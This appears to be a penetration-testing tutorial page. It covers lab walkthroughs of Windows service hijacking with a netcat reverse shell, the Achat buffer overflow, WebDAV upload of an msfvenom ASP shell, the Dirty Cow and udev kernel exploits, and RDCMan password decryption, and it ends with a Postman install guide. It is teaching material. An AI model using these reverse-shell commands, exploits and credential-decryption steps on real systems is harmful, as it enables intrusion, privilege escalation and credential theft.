Windows

BlackwinterSRV - Exploitation: Weak Windows services

Requirements:
blackwinterSrv.exe <-- Download/"Save As" by clicking the link (password: blackwinter)
.NET Framework (Target framework 4.0)

To install as a service:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Path_To_EscalationService\blackwinterSrv.exe

To uninstall service:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe -u C:\Path_To_EscalationService\blackwinterSrv.exe

Depending on your operating system security, you may receive the error: "Exception from HRESULT: 0x80131515" or similar message when installing the service. If so, right-click the program, select Properties, and check the box that says Unblock. If you unblock the file and still receive the same error message, move the service to a folder that your logged in user has permissions for such as the desktop. Additionally, if you see messages pertaining to the installation failing and a rollback being performed, you need to run the command prompt as an administrator or other privileged user.

Once installed successfully, the service will now display in the Services window:

Let's assume right now that you found a vulnerability in a WordPress plugin and now have a nice low privilege shell. After trying to find privilege escalation exploits for the operating system and installed applications, nothing has turned up. So what's next to look for? Vulnerabilities can sometimes occur when an application is installed with SYSTEM-level permissions and is usable by the logged in user. In our case accesschk has found such an application.

We can look at this service in more detail by using the syntax: sc qc blackwinterSrv

What we can grab from this output is that the service is set to automatically start with Windows, we know the executable path, we can see if it has dependencies, and it displays LocalSystem access. Luckily this service does not contain a dependency. If a service does contain a dependency we would need to attempt to escalate using that service instead. In the case of older systems with the UPNPHOST vulnerability, we would need to instead run our commands against the dependency service SSDPSRV.

In rare cases, you may not be able (or want) to restart the box. If this is the case then we need to tell the service that we'll be starting it manually each time. To do so, we type: sc config blackwinterSrv start= "demand". Next, we need to tell the service to connect back to us. We do this by uploading netcat, then setting the binary path using the command: sc config blackwinterSrv binpath= “C:\temp_dir\nc.exe -nv 192.168.168.168 443 -e C:\WINDOWS\System32\cmd.exe” (in this case my temp_dir was set to the desktop). If this command fails and an error is produced, re-type the binpath using case-sensitive characters. We next make sure that there's no password set with the command: sc config blackwinterSrv obj= ".\LocalSystem" password= "". One final query of the service tells us we're all set to connect back to our box using: net start blackwinterSrv.

When we connect back and run the whoami command we see that we've successfully connected as the system user.

Command recap:

Achat - Exploitation: Buffer overflow

Requirements:
Download Achat from: https://www.blackwintersecurity.com/files/achat0-150setup.zip, password: blackwinter or https://sourceforge.net/projects/achat/files/latest/download

Version:
Windows 7 SP1 x86

Details:
After a scan of the machine, two noticeably different ports are open from a normal Windows scan (9255, 9256). To see extra details while executing an nmap scan, either add the '-A' switch or add both '--reason' and '--version-intensity 5' options.

These ports display a program running on it called Achat which is a LAN communications programs. Achat is no longer maintained which is probably partially due to a vulnerability that existed. Using searchsploit, we can find a vulnerability that will help us leverage the box. After a normal searchsploit for achat displays a few extra applications not applicable, I drop the the results down to only Python files by adding '| grep .py'.

Once exploit 36025.py is copied over to a working directory (or downloaded from https://www.exploit-db.com/exploits/36025), the only thing needed to do is to edit the IP address. In this instance, I've changed it to my vulnerable box 192.168.168.168.

To capture our connection, a multi handler is set up with a staged payload of windows/shell_reverse_tcp. We need to create our payload using msfvenom, and to do this we run a command with a large list of bad characters:

This generates the shellcode that we can put inside the exploit (replacing the existing "example" shellcode).

The last step is to run the exploit from the attacker. After doing so the *Poof* output is shown.

The box does not need any further exploitation as this exploit gives us administrator access.

WebDAV - Exploitation: Non-authenticated WebDAV connection

Description:
When WebDAV (Web Distributed Authoring and Versioning) is enabled and authentication is not added or is set to anonymous authentication, an attacker may be able to connect to the publishing directory and upload a reverse shell. Note: While this has been added to the Windows tutorial section, WebDAV can be installed on *nix installations.

Version:
Windows 2012 R2 x64

Details: After a nikto scan of the box (nikto -host 192.168.168.168) the results indicated that WebDAV was available. Among the "verbs" found is one (MKCOL) that defines the ability to create directories inside of WebDAV.

After WebDAV is found, the next step is to figure out what can be uploaded to the folder. To do so the program Davtest is used. This program allows the user to create and test files and folders. The default syntax: davtest -url http://192.168.168.168, creates a random directory and tests certain files to see if they're able to be uploaded and executed. In this case the Davtest results came back positive for text and html files but negative for asp files.

Two other options are commonly used with davtest. The first is the -cleanup option. This will attempt to automatically delete the files and folders created during the test. Do note that certain WebDAV folders do not allow the use of the delete command. The other option is -auth. In a davtest the syntax would be added as: -auth username:password.

Now that text and html objects have been identified as allowable, it's time to upload the shell. The asp file is generated: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.168.169 LPORT=443 -f asp -o shell.asp.

Since asp files are not allowed to be uploaded, the reverse shell will need to be changed to a different file extension. To upload to a WebDAV folder, I use the program Cadaver. It connects simply as 'cadaver http://192.168.168.168'. Not all connections to a server allow viewing files within the root directory and by default the root usually has some sort of homepage. To get around that, a temporary folder is created.

First, the folder 'temp' is created with: mkdir temp. Next, the file is uploaded similar to FTP using: put shell.asp shell.txt. Remember that asp is not directly uploaded, so the file gets renamed with a .txt extension. Finally, the file is copied back to an asp extension using: copy shell.txt shell.asp. Do note that sometimes the 'move' command is blocked. And in some unpatched versions prior to Windows IIS 6.1, the "semicolon-dot" method may be allowed. If this were the case the command would change to: copy shell.txt shell.asp;.txt. Now that the shell is uploaded to the temp folder, it can be browsed to and clicked. Before clicking though, a multi handler is set up to catch our shell.

After the handler is set up and the asp file is clicked, we catch our low privileged shell.

Linux

Dirty Cow - Exploitation: Linux kernel

Older Linux kernels suffer from multiple vulnerabilities. One such popular exploit is titled "Dirty Cow" and is able to attack kernels ranging from 2.6.22 < 4.8.3 (according to CVE-2016-5195). Due to the way memory is handled, we can use this attack to escalate to root.

Here I'm using the x86 version of Debian 5 found at: https://cdimage.debian.org/cdimage/archive/5.0.10/i386/iso-cd/debian-5010-i386-netinst.iso. Assuming we're already on a low privilege shell, the command: uname -a is issued and displays the kernel version.

Here we see that the Linux version being run (2.6.26) is within the range dictated by the CVE. All we have left is to download and compile the code, run it, and enter a password.

After downloading the file using wget from https://www.exploit-db.com/download/40839.c I renamed the file to dirty.c (this is optional). It's also optional if you would like to edit the code with a text editor and replace instances of the name "firefart". According to the code directions, compile options need to be added. The command used to compile is: gcc -pthread dirty.c -o dirty -lcrypt. The code compiles without issue and I can give it executable permissions with 'chmod +x dirty'. The exploit will ask for a password, and once one is put in the program connects as root. (In some cases you may not have output to the screen. If this is the case, press CTRL+C)

The last thing to do is 'su' into the user account. After doing so, I verify that I have root permissions and that the entry is added into /etc/passwd.

Code Recap:

Exploitation: UDEV NETLINK messages

Description: (CVE-2009-1185) Udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space.

Version: The version used for this exploit tutorial is CentOS 5.7 x86 http://vault.centos.org/5.7/isos/i386/CentOS-5.7-i386-bin-DVD.torrent

Details: In some cases there may not be a valid SUID bit set or application that we can exploit. In this case, we're relying on the suggested output produced by linuxprivchecker.py

From the output, there are two privilege escalation exploits available. For this tutorial, I'll be using the second recommendation, 8478.sh. The file is grabbed 'wget https://www.exploit-db.com/download/8478.sh' and put into /tmp. Giving the file execute privs and running it produces an error, so unfortunately this exploit isn't going to allow out-of-the-box execution. Taking a further look into the file with a text editor shows that the bash script is separated into multiple C code modules. We can break each portion up to the _EOF lines. We also need to ignore the gcc portion, as we'll run this manually. Once done, we should have our 3 files (Full source of the fixed code can be found at the end of the tutorial).

We begin to compile the files and receive an error when we get to suid.c.

This is due to the code missing the required headers. We add: "#include <stdlib.h>, #include <unistd.h>, and #include <sys/types.h>" to the top of suid.c. After adding in the headers, suid.c compiles successfully and we now have our 3 compiled binaries. There's a fourth file that's missing though. This file will be created by running the final command from the exploit: gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles. After doing so, we now have all 4 files.

The exploit mentions that it runs against Netlink. To find our Netlink number we type: cat /proc/net/netlink. We're now presented with the Netlink socket info which helps process information between the kernel and user. What we're looking for is the PID in front of the group "ffffffff". In this case, my PID displays 570 (the PID value will vary for different installations). Although the process ID displays 571, it's the actual netlink process ID that we want to focus on. In most cases this will be the udev PID - 1. To verify that we're using the correct PID, we can type: ps aux | grep udev as shown below.

Again, this verifies that we're attacking the correct process and the exploit is ready to be run. Before execution, I checked that the user did not have root permissions and could not access the /root directory. After running the command './udev 570' root access was granted and /root is accessible.

Code Recap:

udev.c

program.c

suid.c

 

Other

RDCMan - Decrypt Microsoft Remote Desktop Manager passwords (RDCman)
https://www.microsoft.com/en-us/download/details.aspx?id=44989

Note: Once compiled, the executable and RDCman.dll will need to be in the same folder.

Open the .rdg file with a text editor and copy in the password section as shown below:

 

After pasting the encrypted string, the cleartext password is displayed


 
ConsoleApp.exe code language: C#


Powershell code below courtesy of badc0d3

Postman - Installation on Kali and Ubuntu

Tutorial courtesy of badc0d3

Requirements:
https://www.getpostman.com

Description:
Postman is a great alternative too the traditional command line curl. It allows you to construct different types of call to any website as well as chain commands together for even more advance automation.

How to install:

  • wget https://dl.pstmn.io/download/latest/linux64 -O postman.tar.gz
  • sudo tar -xzf postman.tar.gz -C /opt
  • rm postman.tar.gz
  • sudo ln -s /opt/Postman/Postman /usr/bin/postman
  • apt-get install libgconf-2-4

Add to Kali menu:

  • apt-get install alacarte
  •  

  • You should now have a new entry in Usual Applications > Accessories > Main Menu
  • Open Main Menu
  • Select the Location you want to add Postman too (I used "Web Application Analysis")
  •  

  • Click on the "New Item" button
  • Fill Out the Launcher Properties
  • Name: Postman
  • Command: postman
  • Icon: click on the icon and select the following png "/opt/Postman/resources/app/assets/icon.png"
  •  

Add to Ubuntu:
Create the following file "~/.local/share/applications/postman.desktop" and then add the content below